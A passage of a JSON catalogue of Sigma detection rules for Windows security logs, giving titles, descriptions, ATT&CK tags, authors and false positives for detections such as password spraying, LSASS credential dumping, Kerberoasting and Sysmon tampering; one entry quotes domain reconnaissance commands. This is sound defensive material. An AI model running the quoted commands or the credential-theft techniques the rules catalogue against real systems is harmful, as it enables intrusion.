"6309ffc4-8fa2-47cf-96b8-a2f72e58e538", - "value": "Failed NTLM Logins with Different Accounts from Single Source System", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ], - "creation_date": "2017/01/10", - "filename": "win_security_susp_failed_logons_single_source2.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.", - "uuid": "5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98", - "value": "Valid Users Failing to Authenticate From Single Source Using Kerberos", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_single_source_kerberos.yml", - "author": "Mauricio Velazco, frack113", - "level": "medium", - "falsepositive": [ - "Vulnerability scanners", - "Misconfigured systems", - "Remote administration tools", - "VPN terminators", - "Multiuser systems like Citrix server farms" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.", - "uuid": "4b6fe998-b69c-46d8-901b-13677c9fb663", - "value": "Disabled Users Failing To Authenticate From Source Using Kerberos", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos2.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_single_source_kerberos2.yml", - "author": "Mauricio Velazco, frack113", - "level": "medium", - "falsepositive": [ - "Vulnerability scanners", - "Misconfigured systems", - "Remote administration tools", - "VPN terminators", - "Multiuser systems like Citrix server farms" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.", - "uuid": "bc93dfe6-8242-411e-a2dd-d16fa0cc8564", - "value": "Invalid Users Failing To Authenticate From Source Using Kerberos", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos3.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_single_source_kerberos3.yml", - "author": "Mauricio Velazco, frack113", - "level": "medium", - "falsepositive": [ - "Vulnerability scanners", - "Misconfigured systems", - "Remote administration tools", - "VPN terminators", - "Multiuser systems like Citrix server farms" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.", - "uuid": "f88bab7f-b1f4-41bb-bdb1-4b8af35b0470", - "value": "Valid Users Failing to Authenticate from Single Source Using NTLM", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_single_source_ntlm.yml", - "author": "Mauricio Velazco", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.", - "uuid": "56d62ef8-3462-4890-9859-7b41e541f8d5", - "value": "Invalid Users Failing To Authenticate From Single Source Using NTLM", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm2.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_single_source_ntlm2.yml", - "author": "Mauricio Velazco", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", - "uuid": "9eb99343-d336-4020-a3cd-67f3819e68ee", - "value": "Account Tampering - Suspicious Failed Logon Reasons", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", - "https://twitter.com/SBousseaden/status/1101431884540710913", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2017/02/19", - "filename": "win_security_susp_failed_logon_reasons.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "User using a disabled account" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", - "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", - "value": "Failed Logon From Public IP", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_source.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.t1078", - "attack.t1190", - "attack.t1133" - ], - "creation_date": "2020/05/06", - "filename": "win_security_susp_failed_logon_source.yml", - "author": "NVISO", - "level": "medium", - "falsepositive": [ - "Legitimate logon attempts over the internet", - "IPv4-to-IPv6 mapped IPs" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a source system failing to authenticate against a remote host with multiple users.", - "uuid": "add2ef8d-dc91-4002-9e7e-f2702369f53a", - "value": "Multiple Users Remotely Failing To Authenticate From Single Source", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_remote_logons_single_source.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_remote_logons_single_source.yml", - "author": "Mauricio Velazco", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "uuid": "f7644214-0eb0-4ace-9455-331ec4c09253", - "value": "Kerberos Manipulation", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ], - "creation_date": "2017/02/10", - "filename": "win_security_susp_kerberos_manipulation.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Faulty legacy applications" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b", - "value": "KrbRelayUp Attack Pattern", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", - "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access" - ], - "creation_date": "2022/04/27", - "filename": "win_security_susp_krbrelayup.yml", - "author": "@SBousseaden, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", - "value": "Suspicious LDAP-Attributes Used", - "meta": { - "refs": [ - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", - "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", - "https://github.com/fox-it/LDAPFragger", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" - ], - "tags": [ - "attack.t1001.003", - "attack.command_and_control" - ], - "creation_date": "2019/03/24", - "filename": "win_security_susp_ldap_dataexchange.yml", - "author": "xknow @xknow_infosec", - "level": "high", - "falsepositive": [ - "Companies, who may use these default LDAP-Attributes for personal information" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", - "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1189469425482829824", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" - ], - "creation_date": "2019/10/31", - "filename": "win_security_susp_local_anon_logon_created.yml", - "author": "James Pemberton / @4A616D6573", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious processes logging on with explicit credentials", - "uuid": "941e5c45-cda7-4864-8cea-bbb7458d194a", - "value": "Suspicious Remote Logon with Explicit Credentials", - "meta": { - "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" - ], - "tags": [ - "attack.t1078", - "attack.lateral_movement" - ], - "creation_date": "2020/10/05", - "filename": "win_security_susp_logon_explicit_credentials.yml", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Administrators that use the RunAS command or scheduled tasks" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects logon events that specify new credentials", - "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b", - "value": "Outgoing Logon with New Credentials", - "meta": { - "refs": [ - "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml" - ], - "tags": "No established tags", - "creation_date": "2022/04/06", - "filename": "win_security_susp_logon_newcredentials.yml", - "author": "Max Altgelt", - "level": "low", - "falsepositive": [ - "Legitimate remote administration activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "value": "Password Dumper Activity on LSASS", - "meta": { - "refs": [ - "https://twitter.com/jackcr/status/807385668833968128", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2017/02/12", - "filename": "win_security_susp_lsass_dump.yml", - "author": "sigma", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects process handle on LSASS process with certain access mask", - "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", - "value": "Generic Password Dumper Activity on LSASS", - "meta": { - "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" - ], - "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" - ], - "creation_date": "2019/11/01", - "filename": "win_security_susp_lsass_dump_generic.yml", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", - "level": "high", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).", - "uuid": "97919310-06a7-482c-9639-92b67ed63cf8", - "value": "Suspicious Multiple File Rename Or Delete Occurred", - "meta": { - "refs": [ - "https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_multiple_files_renamed_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ], - "creation_date": "2020/10/16", - "filename": "win_security_susp_multiple_files_renamed_or_deleted.yml", - "author": "Vasiliy Burov, oscd.community", - "level": "medium", - "falsepositive": [ - "Software uninstallation", - "Files restore activities" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "uuid": "968eef52-9cff-4454-8992-1e74b9cbad6c", - "value": "Reconnaissance Activity", - "meta": { - "refs": [ - "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" - ], - "creation_date": "2017/03/07", - "filename": "win_security_susp_net_recon_activity.yml", - "author": "Florian Roth (rule), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", - "level": "high", - "falsepositive": [ - "Administrator activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", - "value": "Password Protected ZIP File Opened", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1523383197513379841", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" - ], - "tags": "No established tags", - "creation_date": "2022/05/09", - "filename": "win_security_susp_opened_encrypted_zip.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate used of encrypted ZIP files" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", - "value": "Password Protected ZIP File Opened (Suspicious Filenames)", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1523383197513379841", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" - ], - "tags": "No established tags", - "creation_date": "2022/05/09", - "filename": "win_security_susp_opened_encrypted_zip_filename.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate used of encrypted ZIP files" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "uuid": "571498c8-908e-40b4-910b-d2369159a3da", - "value": "Password Protected ZIP File Opened (Email Attachment)", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1523383197513379841", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" - ], - "tags": "No established tags", - "creation_date": "2022/05/09", - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate used of encrypted ZIP files" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "uuid": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "value": "Suspicious Outbound Kerberos Connection - Security", - "meta": { - "refs": [ - "https://github.com/GhostPack/Rubeus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1558.003" - ], - "creation_date": "2019/10/24", - "filename": "win_security_susp_outbound_kerberos_connection.yml", - "author": "Ilyas Ochkov, oscd.community", - "level": "high", - "falsepositive": [ - "Other browsers" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible addition of shadow credentials to an active directory object.", - "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", - "value": "Possible Shadow Credentials Added", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", - "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", - "https://twitter.com/SBousseaden/status/1581300963650187264?", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1556" - ], - "creation_date": "2022/10/17", - "filename": "win_security_susp_possible_shadow_credentials_added.yml", - "author": "Nasreddine Bencherchali (rule), Elastic (idea)", - "level": "high", - "falsepositive": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "uuid": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "value": "Suspicious PsExec Execution", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2019/04/03", - "filename": "win_security_susp_psexec.yml", - "author": "Samir Bousseaden", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects known sensitive file extensions accessed on a network share", - "uuid": "91c945bc-2ad1-4799-a591-4d00198a1215", - "value": "Suspicious Access to Sensitive File Extensions", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" - ], - "tags": [ - "attack.collection", - "attack.t1039" - ], - "creation_date": "2019/04/03", - "filename": "win_security_susp_raccess_sensitive_fext.yml", - "author": "Samir Bousseaden", - "level": "medium", - "falsepositive": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message files" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects service ticket requests using RC4 encryption type", - "uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39", - "value": "Suspicious Kerberos RC4 Ticket Encryption", - "meta": { - "refs": [ - "https://adsecurity.org/?p=3458", - "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ], - "creation_date": "2017/02/06", - "filename": "win_security_susp_rc4_kerberos.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Service accounts used on legacy systems (e.g. NetApp)", - "Windows Domains with DFL 2003 and legacy systems" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "value": "RottenPotato Like Attack Pattern", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1195284233729777665", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rottenpotato.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" - ], - "creation_date": "2019/11/15", - "filename": "win_security_susp_rottenpotato.yml", - "author": "@SBousseaden, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().\n\"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.\n", - "uuid": "7818b381-5eb1-4641-bea5-ef9e4cfb5951", - "value": "Possible Remote Password Change Through SAMR", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_samr_pwset.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ], - "creation_date": "2017/06/09", - "filename": "win_security_susp_samr_pwset.yml", - "author": "Dimitrios Slamaris", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", - "value": "Suspicious Scheduled Task Creation", - "meta": { - "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2022/12/05", - "filename": "win_security_susp_scheduled_task_creation.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective schdueled tasks in order to conduct data destructive activities", - "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", - "value": "Important Scheduled Task Deleted/Disabled", - "meta": { - "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2022/12/05", - "filename": "win_security_susp_scheduled_task_delete.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects update to a scheduled task event that contain suspicious keywords.", - "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", - "value": "Suspicious Scheduled Task Update", - "meta": { - "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2022/12/05", - "filename": "win_security_susp_scheduled_task_update.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects renaming of file while deletion with SDelete tool.", - "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", - "value": "Secure Deletion with SDelete", - "meta": { - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" - ], - "tags": [ - "attack.impact", - "attack.defense_evasion", - "attack.t1070.004", - "attack.t1027.005", - "attack.t1485", - "attack.t1553.002", - "attack.s0195" - ], - "creation_date": "2017/06/14", - "filename": "win_security_susp_sdelete.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Legitimate usage of SDelete" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", - "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", - "value": "Unauthorized System Time Modification", - "meta": { - "refs": [ - "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", - "Live environment caused by malware", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ], - "creation_date": "2019/02/05", - "filename": "win_security_susp_time_modification.yml", - "author": "@neu5ron", - "level": "low", - "falsepositive": [ - "HyperV or other virtualization technologies with binary not listed in filter portion of detection" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detection of logins performed with WMI", - "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", - "value": "Login with WMI", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_wmi_login.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2019/12/04", - "filename": "win_security_susp_wmi_login.yml", - "author": "Thomas Patzke", - "level": "low", - "falsepositive": [ - "Monitoring tools", - "Legitimate system administration" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote service activity via remote access to the svcctl named pipe", - "uuid": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", - "value": "Remote Service Activity via SVCCTL Named Pipe", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.persistence", - "attack.t1021.002" - ], - "creation_date": "2019/04/03", - "filename": "win_security_svcctl_remote_service.yml", - "author": "Samir Bousseaden", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "uuid": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", - "value": "SysKey Registry Keys Access", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190625024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012" - ], - "creation_date": "2019/08/12", - "filename": "win_security_syskey_registry_access.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "uuid": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", - "value": "Sysmon Channel Reference Deletion", - "meta": { - "refs": [ - "https://twitter.com/Flangvik/status/1283054508084473861", - "https://twitter.com/SecurityJosh/status/1283027365770276866", - "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", - "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/07/14", - "filename": "win_security_sysmon_channel_reference_deletion.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": 